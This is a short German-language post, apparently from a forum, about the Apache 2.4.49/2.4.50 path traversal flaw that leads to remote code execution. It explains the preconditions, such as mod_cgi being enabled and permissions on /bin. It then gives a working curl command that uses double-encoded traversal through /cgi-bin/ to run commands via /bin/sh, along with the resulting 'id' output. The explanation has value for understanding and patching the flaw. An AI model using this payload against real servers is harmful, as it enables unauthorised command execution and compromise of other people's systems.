
Remote Code Execution Exploit für Apache-Server. Betroffene Versionen: Apache 2.4.49, Apache 2.4.50
IMHO nur „spezielle“ Setups sind für diesen RCE anfällig.
Dasselbe gilt für die „Arbitrary File Read“-Exploits, die du gesehen hast.
Beide CVEs sind tatsächlich fast dieselbe Path-Traversal-Schwachstelle (die zweite ist der unvollständige Fix für die erste).
Path Traversal funktioniert nur von einer zugeordneten URI aus (z. B. über Apache-Direktiven wie „Alias“ oder „ScriptAlias“). Nur DocumentRoot reicht nicht aus.
„/cgi-bin/“ ist standardmäßig zugeordnet (ScriptAlias), weshalb es vor der Path-Traversal-Zeichenkette verwendet wird.
Außerdem markiert ScriptAlias alle Inhalte des angegebenen Verzeichnisses als Exec (für Apache), unabhängig von den Dateierweiterungen.
1/ mod_cgi aktiviert (nicht Standard, aber einfach)
2/ Ziel-Binary sollte +x sein (Standard für /bin/sh)
3/ Apache-Berechtigungen für /bin oder / erteilt (nicht Standard und schwierig/unrealistisch)\
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)